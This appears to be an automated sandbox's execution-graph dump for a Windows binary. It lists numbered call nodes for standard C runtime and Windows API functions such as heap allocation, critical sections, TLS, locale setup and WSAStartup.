                                                                          Execution Coverage:11.6%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:3.6%
                                                                          Total number of Nodes:750
                                                                          Total number of Limit Nodes:37
                                                                          execution_graph 14939 2c43b75 CloseHandle 14940 2c4855e 14939->14940 14941 2bc104d 14946 2bd2da4 14941->14946 14952 2bd2ca8 14946->14952 14948 2bc1057 14949 2bc1aa9 InterlockedIncrement 14948->14949 14950 2bc105c 14949->14950 14951 2bc1ac5 WSAStartup InterlockedExchange 14949->14951 14951->14950 14953 2bd2cb4 ___lock_fhandle 14952->14953 14960 2bd7f92 14953->14960 14959 2bd2cdb ___lock_fhandle 14959->14948 14977 2bd82ef 14960->14977 14962 2bd2cbd 14963 2bd2cec RtlDecodePointer RtlDecodePointer 14962->14963 14964 2bd2d19 14963->14964 14965 2bd2cc9 14963->14965 14964->14965 15276 2bd8b5d 14964->15276 14974 2bd2ce6 14965->14974 14967 2bd2d7c RtlEncodePointer RtlEncodePointer 14967->14965 14968 2bd2d2b 14968->14967 14969 2bd2d50 14968->14969 15283 2bd84fd 14968->15283 14969->14965 14971 2bd84fd __realloc_crt 62 API calls 14969->14971 14973 2bd2d6a RtlEncodePointer 14969->14973 14972 2bd2d64 14971->14972 14972->14965 14972->14973 14973->14967 15310 2bd7f9b 14974->15310 14978 2bd8300 14977->14978 14979 2bd8313 RtlEnterCriticalSection 14977->14979 14984 2bd8377 14978->14984 14979->14962 14981 2bd8306 14981->14979 15006 2bd7e3f 14981->15006 14985 2bd8383 ___lock_fhandle 14984->14985 14986 2bd83a2 14985->14986 15013 2bd80d5 14985->15013 14995 2bd83c5 ___lock_fhandle 14986->14995 15060 2bd84b6 14986->15060 14992 2bd8398 15057 2bd7d1c 14992->15057 14993 2bd83cf 14996 2bd82ef __lock 59 API calls 14993->14996 14994 2bd83c0 15065 2bd585b 14994->15065 14995->14981 14999 2bd83d6 14996->14999 15000 2bd83fb 14999->15000 15001 2bd83e3 14999->15001 15071 2bd2974 15000->15071 15068 2bd8c0c 15001->15068 15004 2bd83ef 15077 2bd8417 15004->15077 15007 2bd80d5 __FF_MSGBANNER 59 API calls 15006->15007 15008 2bd7e47 15007->15008 15009 2bd8132 __NMSG_WRITE 59 API calls 15008->15009 15010 2bd7e4f 15009->15010 15246 2bd7eee 15010->15246 15080 2bdfb7e 15013->15080 15015 2bd80dc 15017 2bdfb7e __NMSG_WRITE 59 API calls 15015->15017 15019 2bd80e9 15015->15019 15016 2bd8132 __NMSG_WRITE 59 API calls 15018 2bd8101 15016->15018 15017->15019 15021 2bd8132 __NMSG_WRITE 59 API calls 15018->15021 15019->15016 15020 2bd810b 15019->15020 15022 2bd8132 15020->15022 15021->15020 15023 2bd8150 __NMSG_WRITE 15022->15023 15024 2bdfb7e __NMSG_WRITE 55 API calls 15023->15024 15056 2bd8277 15023->15056 15026 2bd8163 15024->15026 15028 2bd827c GetStdHandle 15026->15028 15029 2bdfb7e __NMSG_WRITE 55 API calls 15026->15029 15027 2bd82e0 15027->14992 15032 2bd828a std::exception::_Copy_str 15028->15032 15028->15056 15030 2bd8174 15029->15030 15030->15028 15031 2bd8186 15030->15031 15031->15056 15102 2bdef3d 15031->15102 15034 2bd82c3 WriteFile 15032->15034 15032->15056 15034->15056 15036 2bd82e4 15040 2bd4905 __invoke_watson 8 API calls 15036->15040 15037 2bd81b3 GetModuleFileNameW 15038 2bd81e3 __NMSG_WRITE 15037->15038 15039 2bd81d3 15037->15039 15038->15036 15049 2bd8229 15038->15049 15111 2bdefb2 15038->15111 15041 2bdef3d __NMSG_WRITE 55 API calls 15039->15041 15042 2bd82ee 15040->15042 15041->15038 15043 2bd8313 RtlEnterCriticalSection 15042->15043 15044 2bd8377 __mtinitlocknum 55 API calls 15042->15044 15043->14992 15046 2bd8306 15044->15046 15046->15043 15050 2bd7e3f __amsg_exit 55 API calls 15046->15050 15049->15036 15120 2bdeed1 15049->15120 15052 2bd8312 15050->15052 15051 2bdeed1 __NMSG_WRITE 55 API calls 15053 2bd8260 15051->15053 15052->15043 15053->15036 15054 2bd8267 15053->15054 15129 2bdfbbe RtlEncodePointer 15054->15129 15154 2bd3f4b 15056->15154 15169 2bd7ce8 GetModuleHandleExW 15057->15169 15063 2bd84c4 15060->15063 15062 2bd83b9 15062->14993 15062->14994 15063->15062 15172 2bd29ac 15063->15172 15189 2bd8f05 Sleep 15063->15189 15192 2bd5672 GetLastError 15065->15192 15067 2bd5860 15067->14995 15069 2bd8c1c 15068->15069 15070 2bd8c29 InitializeCriticalSectionAndSpinCount 15068->15070 15069->15004 15070->15004 15072 2bd297d HeapFree 15071->15072 15073 2bd29a6 __dosmaperr 15071->15073 15072->15073 15074 2bd2992 15072->15074 15073->15004 15075 2bd585b __cftoe2_l 57 API calls 15074->15075 15076 2bd2998 GetLastError 15075->15076 15076->15073 15245 2bd8459 RtlLeaveCriticalSection 15077->15245 15079 2bd841e 15079->14995 15081 2bdfb88 15080->15081 15082 2bdfb92 15081->15082 15083 2bd585b __cftoe2_l 59 API calls 15081->15083 15082->15015 15084 2bdfbae 15083->15084 15087 2bd48f5 15084->15087 15090 2bd48ca RtlDecodePointer 15087->15090 15091 2bd48dd 15090->15091 15096 2bd4905 IsProcessorFeaturePresent 15091->15096 15094 2bd48ca __cftoe2_l 8 API calls 15095 2bd4901 15094->15095 15095->15015 15097 2bd4910 15096->15097 15098 2bd4798 __call_reportfault 7 API calls 15097->15098 15099 2bd4925 15098->15099 15100 2bd8f13 ___raise_securityfailure GetCurrentProcess TerminateProcess 15099->15100 15101 2bd48f4 15100->15101 15101->15094 15103 2bdef48 15102->15103 15104 2bdef56 15102->15104 15103->15104 15109 2bdef6f 15103->15109 15105 2bd585b __cftoe2_l 59 API calls 15104->15105 15106 2bdef60 15105->15106 15107 2bd48f5 __cftoe2_l 9 API calls 15106->15107 15108 2bd81a6 15107->15108 15108->15036 15108->15037 15109->15108 15110 2bd585b __cftoe2_l 59 API calls 15109->15110 15110->15106 15112 2bdefc0 15111->15112 15115 2bdefc4 15112->15115 15117 2bdefc9 15112->15117 15118 2bdf003 15112->15118 15113 2bd585b __cftoe2_l 59 API calls 15114 2bdeff4 15113->15114 15116 2bd48f5 __cftoe2_l 9 API calls 15114->15116 15115->15113 15115->15117 15116->15117 15117->15049 15118->15117 15119 2bd585b __cftoe2_l 59 API calls 15118->15119 15119->15114 15121 2bdeeeb 15120->15121 15123 2bdeedd 15120->15123 15122 2bd585b __cftoe2_l 59 API calls 15121->15122 15128 2bdeef5 15122->15128 15123->15121 15126 2bdef17 15123->15126 15124 2bd48f5 __cftoe2_l 9 API calls 15125 2bd8249 15124->15125 15125->15036 15125->15051 15126->15125 15127 2bd585b __cftoe2_l 59 API calls 15126->15127 15127->15128 15128->15124 15130 2bdfbf2 ___crtIsPackagedApp 15129->15130 15131 2bdfcb1 IsDebuggerPresent 15130->15131 15132 2bdfc01 LoadLibraryExW 15130->15132 15135 2bdfcbb 15131->15135 15136 2bdfcd6 15131->15136 15133 2bdfc3e GetProcAddress 15132->15133 15134 2bdfc18 GetLastError 15132->15134 15138 2bdfc52 7 API calls 15133->15138 15144 2bdfcce 15133->15144 15137 2bdfc27 LoadLibraryExW 15134->15137 15134->15144 15139 2bdfcc9 15135->15139 15140 2bdfcc2 OutputDebugStringW 15135->15140 15136->15139 15141 2bdfcdb RtlDecodePointer 15136->15141 15137->15133 15137->15144 15142 2bdfcae 15138->15142 15143 2bdfc9a GetProcAddress RtlEncodePointer 15138->15143 15139->15144 15145 2bdfd02 RtlDecodePointer RtlDecodePointer 15139->15145 15153 2bdfd1a 15139->15153 15140->15139 15141->15144 15142->15131 15143->15142 15146 2bd3f4b __cftoe2_l 6 API calls 15144->15146 15145->15153 15149 2bdfda0 15146->15149 15147 2bdfd52 RtlDecodePointer 15150 2bdfd59 15147->15150 15152 2bdfd3e RtlDecodePointer 15147->15152 15149->15056 15151 2bdfd6a RtlDecodePointer 15150->15151 15150->15152 15151->15152 15152->15144 15153->15147 15153->15152 15155 2bd3f55 IsProcessorFeaturePresent 15154->15155 15156 2bd3f53 15154->15156 15158 2bd8f8f 15155->15158 15156->15027 15161 2bd8f3e IsDebuggerPresent 15158->15161 15162 2bd8f53 ___raise_securityfailure 15161->15162 15167 2bd8f28 SetUnhandledExceptionFilter UnhandledExceptionFilter 15162->15167 15165 2bd8f5b ___raise_securityfailure 15168 2bd8f13 GetCurrentProcess TerminateProcess 15165->15168 15166 2bd8f78 15166->15027 15167->15165 15168->15166 15170 2bd7d13 ExitProcess 15169->15170 15171 2bd7d01 GetProcAddress 15169->15171 15171->15170 15173 2bd2a27 15172->15173 15177 2bd29b8 15172->15177 15174 2bd7c03 __calloc_impl RtlDecodePointer 15173->15174 15175 2bd2a2d 15174->15175 15178 2bd585b __cftoe2_l 58 API calls 15175->15178 15176 2bd29c3 15176->15177 15179 2bd80d5 __FF_MSGBANNER 58 API calls 15176->15179 15182 2bd8132 __NMSG_WRITE 58 API calls 15176->15182 15186 2bd7d1c _doexit 3 API calls 15176->15186 15177->15176 15180 2bd29eb RtlAllocateHeap 15177->15180 15183 2bd2a13 15177->15183 15187 2bd2a11 15177->15187 15190 2bd7c03 RtlDecodePointer 15177->15190 15181 2bd2a1f 15178->15181 15179->15176 15180->15177 15180->15181 15181->15063 15182->15176 15185 2bd585b __cftoe2_l 58 API calls 15183->15185 15185->15187 15186->15176 15188 2bd585b __cftoe2_l 58 API calls 15187->15188 15188->15181 15189->15063 15191 2bd7c16 15190->15191 15191->15177 15206 2bd8bcb 15192->15206 15194 2bd5687 15195 2bd56d5 SetLastError 15194->15195 15209 2bd846e 15194->15209 15195->15067 15199 2bd56ae 15200 2bd56cc 15199->15200 15201 2bd56b4 15199->15201 15203 2bd2974 __freefls@4 56 API calls 15200->15203 15218 2bd56e1 15201->15218 15205 2bd56d2 15203->15205 15204 2bd56bc GetCurrentThreadId 15204->15195 15205->15195 15207 2bd8bde 15206->15207 15208 2bd8be2 TlsGetValue 15206->15208 15207->15194 15208->15194 15211 2bd8475 15209->15211 15212 2bd569a 15211->15212 15214 2bd8493 15211->15214 15228 2bdfeb8 15211->15228 15212->15195 15215 2bd8bea 15212->15215 15214->15211 15214->15212 15236 2bd8f05 Sleep 15214->15236 15216 2bd8c04 TlsSetValue 15215->15216 15217 2bd8c00 15215->15217 15216->15199 15217->15199 15219 2bd56ed ___lock_fhandle 15218->15219 15220 2bd82ef __lock 59 API calls 15219->15220 15221 2bd572a 15220->15221 15237 2bd5782 15221->15237 15224 2bd82ef __lock 59 API calls 15225 2bd574b ___addlocaleref 15224->15225 15240 2bd578b 15225->15240 15227 2bd5776 ___lock_fhandle 15227->15204 15229 2bdfec3 15228->15229 15231 2bdfede 15228->15231 15230 2bdfecf 15229->15230 15229->15231 15232 2bd585b __cftoe2_l 58 API calls 15230->15232 15233 2bdfeee RtlAllocateHeap 15231->15233 15234 2bdfed4 15231->15234 15235 2bd7c03 __calloc_impl RtlDecodePointer 15231->15235 15232->15234 15233->15231 15233->15234 15234->15211 15235->15231 15236->15214 15243 2bd8459 RtlLeaveCriticalSection 15237->15243 15239 2bd5744 15239->15224 15244 2bd8459 RtlLeaveCriticalSection 15240->15244 15242 2bd5792 15242->15227 15243->15239 15244->15242 15245->15079 15249 2bd7fa6 15246->15249 15248 2bd7e5a 15250 2bd7fb2 ___lock_fhandle 15249->15250 15251 2bd82ef __lock 52 API calls 15250->15251 15252 2bd7fb9 15251->15252 15253 2bd8072 _doexit 15252->15253 15254 2bd7fe7 RtlDecodePointer 15252->15254 15269 2bd80c0 15253->15269 15254->15253 15256 2bd7ffe RtlDecodePointer 15254->15256 15262 2bd800e 15256->15262 15258 2bd80cf ___lock_fhandle 15258->15248 15260 2bd801b RtlEncodePointer 15260->15262 15261 2bd80b7 15263 2bd80c0 15261->15263 15264 2bd7d1c _doexit 3 API calls 15261->15264 15262->15253 15262->15260 15265 2bd802b RtlDecodePointer RtlEncodePointer 15262->15265 15266 2bd80cd 15263->15266 15274 2bd8459 RtlLeaveCriticalSection 15263->15274 15264->15263 15268 2bd803d RtlDecodePointer RtlDecodePointer 15265->15268 15266->15248 15268->15262 15270 2bd80c6 15269->15270 15272 2bd80a0 15269->15272 15275 2bd8459 RtlLeaveCriticalSection 15270->15275 15272->15258 15273 2bd8459 RtlLeaveCriticalSection 15272->15273 15273->15261 15274->15266 15275->15272 15277 2bd8b7b RtlSizeHeap 15276->15277 15278 2bd8b66 15276->15278 15277->14968 15279 2bd585b __cftoe2_l 59 API calls 15278->15279 15280 2bd8b6b 15279->15280 15281 2bd48f5 __cftoe2_l 9 API calls 15280->15281 15282 2bd8b76 15281->15282 15282->14968 15285 2bd8504 15283->15285 15286 2bd8541 15285->15286 15288 2bdfda4 15285->15288 15309 2bd8f05 Sleep 15285->15309 15286->14969 15289 2bdfdad 15288->15289 15290 2bdfdb8 15288->15290 15291 2bd29ac _malloc 59 API calls 15289->15291 15292 2bdfdc0 15290->15292 15300 2bdfdcd 15290->15300 15293 2bdfdb5 15291->15293 15294 2bd2974 __freefls@4 59 API calls 15292->15294 15293->15285 15308 2bdfdc8 __dosmaperr 15294->15308 15295 2bdfe05 15297 2bd7c03 __calloc_impl RtlDecodePointer 15295->15297 15296 2bdfdd5 RtlReAllocateHeap 15296->15300 15296->15308 15298 2bdfe0b 15297->15298 15301 2bd585b __cftoe2_l 59 API calls 15298->15301 15299 2bdfe35 15303 2bd585b __cftoe2_l 59 API calls 15299->15303 15300->15295 15300->15296 15300->15299 15302 2bd7c03 __calloc_impl RtlDecodePointer 15300->15302 15305 2bdfe1d 15300->15305 15301->15308 15302->15300 15304 2bdfe3a GetLastError 15303->15304 15304->15308 15306 2bd585b __cftoe2_l 59 API calls 15305->15306 15307 2bdfe22 GetLastError 15306->15307 15307->15308 15308->15285 15309->15285 15313 2bd8459 RtlLeaveCriticalSection 15310->15313 15312 2bd2ceb 15312->14959 15313->15312 15314 2bd370f 15315 2bd371d 15314->15315 15316 2bd3718 15314->15316 15320 2bd3732 15315->15320 15328 2bdb2e4 15316->15328 15319 2bd372b 15321 2bd373e ___lock_fhandle 15320->15321 15325 2bd378c ___DllMainCRTStartup 15321->15325 15327 2bd37e9 ___lock_fhandle 15321->15327 15332 2bd359d 15321->15332 15323 2bd37c6 15324 2bd359d __CRT_INIT@12 138 API calls 15323->15324 15323->15327 15324->15327 15325->15323 15326 2bd359d __CRT_INIT@12 138 API calls 15325->15326 15325->15327 15326->15323 15327->15319 15329 2bdb314 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 15328->15329 15330 2bdb307 15328->15330 15331 2bdb30b 15329->15331 15330->15329 15330->15331 15331->15315 15333 2bd35a9 ___lock_fhandle 15332->15333 15334 2bd362b 15333->15334 15335 2bd35b1 15333->15335 15337 2bd362f 15334->15337 15338 2bd3694 15334->15338 15380 2bd7be6 GetProcessHeap 15335->15380 15342 2bd3650 15337->15342 15349 2bd35ba ___lock_fhandle __CRT_INIT@12 15337->15349 15481 2bd7e5b 15337->15481 15340 2bd3699 15338->15340 15341 2bd36f7 15338->15341 15339 2bd35b6 15339->15349 15381 2bd5794 15339->15381 15343 2bd8bcb __getptd_noexit TlsGetValue 15340->15343 15341->15349 15512 2bd5624 15341->15512 15484 2bd7d32 RtlDecodePointer 15342->15484 15346 2bd36a4 15343->15346 15346->15349 15352 2bd846e __calloc_crt 59 API calls 15346->15352 15349->15325 15350 2bd35c6 __RTC_Initialize 15350->15349 15357 2bd35d6 GetCommandLineA 15350->15357 15353 2bd36b5 15352->15353 15353->15349 15358 2bd8bea __getptd_noexit TlsSetValue 15353->15358 15354 2bdaf7f __ioterm 60 API calls 15356 2bd3661 15354->15356 15359 2bd580a __mtterm 62 API calls 15356->15359 15402 2bdb380 GetEnvironmentStringsW 15357->15402 15361 2bd36cd 15358->15361 15362 2bd3666 __CRT_INIT@12 15359->15362 15364 2bd36eb 15361->15364 15365 2bd36d3 15361->15365 15508 2bd367f 15362->15508 15368 2bd2974 __freefls@4 59 API calls 15364->15368 15367 2bd56e1 __initptd 59 API calls 15365->15367 15370 2bd36db GetCurrentThreadId 15367->15370 15368->15349 15369 2bd35f0 15371 2bd35f4 15369->15371 15434 2bdafd4 15369->15434 15370->15349 15467 2bd580a 15371->15467 15375 2bd3614 15375->15349 15476 2bdaf7f 15375->15476 15380->15339 15520 2bd7f02 RtlEncodePointer 15381->15520 15383 2bd5799 15525 2bd8420 15383->15525 15386 2bd57a2 15387 2bd580a __mtterm 62 API calls 15386->15387 15389 2bd57a7 15387->15389 15389->15350 15391 2bd57bf 15392 2bd846e __calloc_crt 59 API calls 15391->15392 15393 2bd57cc 15392->15393 15394 2bd5801 15393->15394 15396 2bd8bea __getptd_noexit TlsSetValue 15393->15396 15395 2bd580a __mtterm 62 API calls 15394->15395 15397 2bd5806 15395->15397 15398 2bd57e0 15396->15398 15397->15350 15398->15394 15399 2bd57e6 15398->15399 15400 2bd56e1 __initptd 59 API calls 15399->15400 15401 2bd57ee GetCurrentThreadId 15400->15401 15401->15350 15404 2bdb393 15402->15404 15408 2bd35e6 15402->15408 15403 2bdb3ab WideCharToMultiByte 15405 2bdb3fd FreeEnvironmentStringsW 15403->15405 15406 2bdb3c6 15403->15406 15404->15403 15404->15404 15405->15408 15407 2bd84b6 __malloc_crt 59 API calls 15406->15407 15409 2bdb3cc 15407->15409 15415 2bdaccb 15408->15415 15409->15405 15410 2bdb3d3 WideCharToMultiByte 15409->15410 15411 2bdb3e9 15410->15411 15412 2bdb3f2 FreeEnvironmentStringsW 15410->15412 15413 2bd2974 __freefls@4 59 API calls 15411->15413 15412->15408 15414 2bdb3ef 15413->15414 15414->15412 15416 2bdacd7 ___lock_fhandle 15415->15416 15417 2bd82ef __lock 59 API calls 15416->15417 15418 2bdacde 15417->15418 15419 2bd846e __calloc_crt 59 API calls 15418->15419 15420 2bdacef 15419->15420 15421 2bdad5a GetStartupInfoW 15420->15421 15422 2bdacfa ___lock_fhandle @_EH4_CallFilterFunc@8 15420->15422 15429 2bdae9e 15421->15429 15430 2bdad6f 15421->15430 15422->15369 15423 2bdaf66 15533 2bdaf76 15423->15533 15425 2bd846e __calloc_crt 59 API calls 15425->15430 15426 2bdaeeb GetStdHandle 15426->15429 15427 2bdadbd 15427->15429 15431 2bdadf1 GetFileType 15427->15431 15432 2bd8c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15427->15432 15428 2bdaefe GetFileType 15428->15429 15429->15423 15429->15426 15429->15428 15433 2bd8c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15429->15433 15430->15425 15430->15427 15430->15429 15431->15427 15432->15427 15433->15429 15435 2bdafe7 GetModuleFileNameA 15434->15435 15436 2bdafe2 15434->15436 15437 2bdb014 15435->15437 15543 2bd4c8a 15436->15543 15537 2bdb087 15437->15537 15441 2bd84b6 __malloc_crt 59 API calls 15442 2bdb04d 15441->15442 15443 2bdb087 _parse_cmdline 59 API calls 15442->15443 15444 2bd3600 15442->15444 15443->15444 15444->15375 15445 2bdb203 15444->15445 15446 2bdb20c 15445->15446 15449 2bdb211 std::exception::_Copy_str 15445->15449 15447 2bd4c8a ___initmbctable 71 API calls 15446->15447 15447->15449 15448 2bd3609 15448->15375 15461 2bd7e6a 15448->15461 15449->15448 15450 2bd846e __calloc_crt 59 API calls 15449->15450 15457 2bdb247 std::exception::_Copy_str 15450->15457 15451 2bdb299 15452 2bd2974 __freefls@4 59 API calls 15451->15452 15452->15448 15453 2bd846e __calloc_crt 59 API calls 15453->15457 15454 2bdb2c0 15455 2bd2974 __freefls@4 59 API calls 15454->15455 15455->15448 15457->15448 15457->15451 15457->15453 15457->15454 15458 2bdb2d7 15457->15458 15747 2bd66bc 15457->15747 15459 2bd4905 __invoke_watson 8 API calls 15458->15459 15460 2bdb2e3 15459->15460 15462 2bd7e76 __IsNonwritableInCurrentImage 15461->15462 15756 2bdccdf 15462->15756 15464 2bd7e94 __initterm_e 15465 2bd2da4 __cinit 68 API calls 15464->15465 15466 2bd7eb3 _doexit __IsNonwritableInCurrentImage 15464->15466 15465->15466 15466->15375 15468 2bd5814 15467->15468 15469 2bd581a 15467->15469 15759 2bd8bac 15468->15759 15471 2bd8339 RtlDeleteCriticalSection 15469->15471 15472 2bd8355 15469->15472 15473 2bd2974 __freefls@4 59 API calls 15471->15473 15474 2bd8361 RtlDeleteCriticalSection 15472->15474 15475 2bd8374 15472->15475 15473->15469 15474->15472 15475->15349 15478 2bdaf86 15476->15478 15477 2bdafce 15477->15371 15478->15477 15479 2bd2974 __freefls@4 59 API calls 15478->15479 15480 2bdaf9f RtlDeleteCriticalSection 15478->15480 15479->15478 15480->15478 15482 2bd7fa6 _doexit 59 API calls 15481->15482 15483 2bd7e66 15482->15483 15483->15342 15485 2bd7d4c 15484->15485 15486 2bd7d5e 15484->15486 15485->15486 15488 2bd2974 __freefls@4 59 API calls 15485->15488 15487 2bd2974 __freefls@4 59 API calls 15486->15487 15489 2bd7d6b 15487->15489 15488->15485 15490 2bd7d8f 15489->15490 15493 2bd2974 __freefls@4 59 API calls 15489->15493 15491 2bd2974 __freefls@4 59 API calls 15490->15491 15492 2bd7d9b 15491->15492 15494 2bd2974 __freefls@4 59 API calls 15492->15494 15493->15489 15495 2bd7dac 15494->15495 15496 2bd2974 __freefls@4 59 API calls 15495->15496 15497 2bd7db7 15496->15497 15498 2bd7ddc RtlEncodePointer 15497->15498 15501 2bd2974 __freefls@4 59 API calls 15497->15501 15499 2bd7df7 15498->15499 15500 2bd7df1 15498->15500 15503 2bd7e0d 15499->15503 15506 2bd2974 __freefls@4 59 API calls 15499->15506 15502 2bd2974 __freefls@4 59 API calls 15500->15502 15505 2bd7ddb 15501->15505 15502->15499 15504 2bd3655 15503->15504 15507 2bd2974 __freefls@4 59 API calls 15503->15507 15504->15354 15504->15362 15505->15498 15506->15503 15507->15504 15509 2bd3691 15508->15509 15510 2bd3683 15508->15510 15509->15349 15510->15509 15511 2bd580a __mtterm 62 API calls 15510->15511 15511->15509 15513 2bd5631 15512->15513 15519 2bd5657 15512->15519 15514 2bd563f 15513->15514 15515 2bd8bcb __getptd_noexit TlsGetValue 15513->15515 15516 2bd8bea __getptd_noexit TlsSetValue 15514->15516 15515->15514 15517 2bd564f 15516->15517 15762 2bd54ef 15517->15762 15519->15349 15521 2bd7f13 __init_pointers __initp_misc_winsig 15520->15521 15532 2bd3407 RtlEncodePointer 15521->15532 15523 2bd7f2b __init_pointers 15524 2bd8c7a 34 API calls 15523->15524 15524->15383 15526 2bd842c 15525->15526 15527 2bd8c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15526->15527 15528 2bd579e 15526->15528 15527->15526 15528->15386 15529 2bd8b8e 15528->15529 15530 2bd57b4 15529->15530 15531 2bd8ba5 TlsAlloc 15529->15531 15530->15386 15530->15391 15532->15523 15536 2bd8459 RtlLeaveCriticalSection 15533->15536 15535 2bdaf7d 15535->15422 15536->15535 15539 2bdb0a9 15537->15539 15541 2bdb10d 15539->15541 15547 2be0fd6 15539->15547 15540 2bdb02a 15540->15441 15540->15444 15541->15540 15542 2be0fd6 _parse_cmdline 59 API calls 15541->15542 15542->15541 15544 2bd4c9a 15543->15544 15545 2bd4c93 15543->15545 15544->15435 15635 2bd4fe7 15545->15635 15550 2be0f7c 15547->15550 15553 2bd1c7b 15550->15553 15554 2bd1c8c 15553->15554 15560 2bd1cd9 15553->15560 15561 2bd565a 15554->15561 15557 2bd1cb9 15557->15560 15581 2bd4f41 15557->15581 15560->15539 15562 2bd5672 __getptd_noexit 59 API calls 15561->15562 15563 2bd5660 15562->15563 15564 2bd1c92 15563->15564 15565 2bd7e3f __amsg_exit 59 API calls 15563->15565 15564->15557 15566 2bd4bbf 15564->15566 15565->15564 15567 2bd4bcb ___lock_fhandle 15566->15567 15568 2bd565a FindHandlerForForeignException 59 API calls 15567->15568 15569 2bd4bd4 15568->15569 15570 2bd4c03 15569->15570 15571 2bd4be7 15569->15571 15572 2bd82ef __lock 59 API calls 15570->15572 15574 2bd565a FindHandlerForForeignException 59 API calls 15571->15574 15573 2bd4c0a 15572->15573 15593 2bd4c3f 15573->15593 15576 2bd4bec 15574->15576 15579 2bd4bfa ___lock_fhandle 15576->15579 15580 2bd7e3f __amsg_exit 59 API calls 15576->15580 15579->15557 15580->15579 15582 2bd4f4d ___lock_fhandle 15581->15582 15583 2bd565a FindHandlerForForeignException 59 API calls 15582->15583 15584 2bd4f57 15583->15584 15585 2bd4f69 15584->15585 15586 2bd82ef __lock 59 API calls 15584->15586 15587 2bd4f77 ___lock_fhandle 15585->15587 15589 2bd7e3f __amsg_exit 59 API calls 15585->15589 15591 2bd4f87 15586->15591 15587->15560 15588 2bd4fb4 15631 2bd4fde 15588->15631 15589->15587 15591->15588 15592 2bd2974 __freefls@4 59 API calls 15591->15592 15592->15588 15594 2bd4c4a ___addlocaleref ___removelocaleref 15593->15594 15596 2bd4c1e 15593->15596 15594->15596 15600 2bd49c5 15594->15600 15597 2bd4c36 15596->15597 15630 2bd8459 RtlLeaveCriticalSection 15597->15630 15599 2bd4c3d 15599->15576 15601 2bd4a3e 15600->15601 15602 2bd49da 15600->15602 15603 2bd4a8b 15601->15603 15604 2bd2974 __freefls@4 59 API calls 15601->15604 15602->15601 15610 2bd2974 __freefls@4 59 API calls 15602->15610 15613 2bd4a0b 15602->15613 15605 2bdcf3d ___free_lc_time 59 API calls 15603->15605 15619 2bd4ab4 15603->15619 15606 2bd4a5f 15604->15606 15607 2bd4aa9 15605->15607 15608 2bd2974 __freefls@4 59 API calls 15606->15608 15611 2bd2974 __freefls@4 59 API calls 15607->15611 15614 2bd4a72 15608->15614 15609 2bd2974 __freefls@4 59 API calls 15618 2bd4a33 15609->15618 15620 2bd4a00 15610->15620 15611->15619 15612 2bd4b13 15621 2bd2974 __freefls@4 59 API calls 15612->15621 15615 2bd2974 __freefls@4 59 API calls 15613->15615 15629 2bd4a29 15613->15629 15617 2bd2974 __freefls@4 59 API calls 15614->15617 15622 2bd4a1e 15615->15622 15616 2bd2974 59 API calls __freefls@4 15616->15619 15623 2bd4a80 15617->15623 15624 2bd2974 __freefls@4 59 API calls 15618->15624 15619->15612 15619->15616 15625 2bdcdda ___free_lconv_mon 59 API calls 15620->15625 15626 2bd4b19 15621->15626 15627 2bdced6 ___free_lconv_num 59 API calls 15622->15627 15628 2bd2974 __freefls@4 59 API calls 15623->15628 15624->15601 15625->15613 15626->15596 15627->15629 15628->15603 15629->15609 15630->15599 15634 2bd8459 RtlLeaveCriticalSection 15631->15634 15633 2bd4fe5 15633->15585 15634->15633 15636 2bd4ff3 ___lock_fhandle 15635->15636 15637 2bd565a FindHandlerForForeignException 59 API calls 15636->15637 15638 2bd4ffb 15637->15638 15639 2bd4f41 _LocaleUpdate::_LocaleUpdate 59 API calls 15638->15639 15640 2bd5005 15639->15640 15660 2bd4ce2 15640->15660 15643 2bd84b6 __malloc_crt 59 API calls 15644 2bd5027 15643->15644 15645 2bd5154 ___lock_fhandle 15644->15645 15667 2bd518f 15644->15667 15645->15544 15648 2bd505d 15650 2bd507d 15648->15650 15654 2bd2974 __freefls@4 59 API calls 15648->15654 15649 2bd5164 15649->15645 15651 2bd5177 15649->15651 15652 2bd2974 __freefls@4 59 API calls 15649->15652 15650->15645 15655 2bd82ef __lock 59 API calls 15650->15655 15653 2bd585b __cftoe2_l 59 API calls 15651->15653 15652->15651 15653->15645 15654->15650 15656 2bd50ac 15655->15656 15657 2bd513a 15656->15657 15659 2bd2974 __freefls@4 59 API calls 15656->15659 15677 2bd5159 15657->15677 15659->15657 15661 2bd1c7b _LocaleUpdate::_LocaleUpdate 59 API calls 15660->15661 15662 2bd4cf2 15661->15662 15663 2bd4d01 GetOEMCP 15662->15663 15664 2bd4d13 15662->15664 15666 2bd4d2a 15663->15666 15665 2bd4d18 GetACP 15664->15665 15664->15666 15665->15666 15666->15643 15666->15645 15668 2bd4ce2 getSystemCP 61 API calls 15667->15668 15669 2bd51ac 15668->15669 15672 2bd51fd IsValidCodePage 15669->15672 15674 2bd51b3 setSBCS 15669->15674 15676 2bd5222 _memset __setmbcp_nolock 15669->15676 15670 2bd3f4b __cftoe2_l 6 API calls 15671 2bd504e 15670->15671 15671->15648 15671->15649 15673 2bd520f GetCPInfo 15672->15673 15672->15674 15673->15674 15673->15676 15674->15670 15680 2bd4daf GetCPInfo 15676->15680 15746 2bd8459 RtlLeaveCriticalSection 15677->15746 15679 2bd5160 15679->15645 15681 2bd4de7 15680->15681 15689 2bd4e91 15680->15689 15690 2bdd61d 15681->15690 15683 2bd3f4b __cftoe2_l 6 API calls 15685 2bd4f3d 15683->15685 15685->15674 15688 2bdd4c1 ___crtLCMapStringA 63 API calls 15688->15689 15689->15683 15691 2bd1c7b _LocaleUpdate::_LocaleUpdate 59 API calls 15690->15691 15692 2bdd62e 15691->15692 15700 2bdd525 15692->15700 15695 2bdd4c1 15696 2bd1c7b _LocaleUpdate::_LocaleUpdate 59 API calls 15695->15696 15697 2bdd4d2 15696->15697 15717 2bdd2bd 15697->15717 15701 2bdd54c MultiByteToWideChar 15700->15701 15702 2bdd53f 15700->15702 15703 2bdd578 15701->15703 15712 2bdd571 15701->15712 15702->15701 15706 2bdd59a _memset 15703->15706 15707 2bd29ac _malloc 59 API calls 15703->15707 15704 2bd3f4b __cftoe2_l 6 API calls 15705 2bd4e48 15704->15705 15705->15695 15708 2bdd5d6 MultiByteToWideChar 15706->15708 15706->15712 15707->15706 15709 2bdd600 15708->15709 15710 2bdd5f0 GetStringTypeW 15708->15710 15713 2bdd507 15709->15713 15710->15709 15712->15704 15714 2bdd511 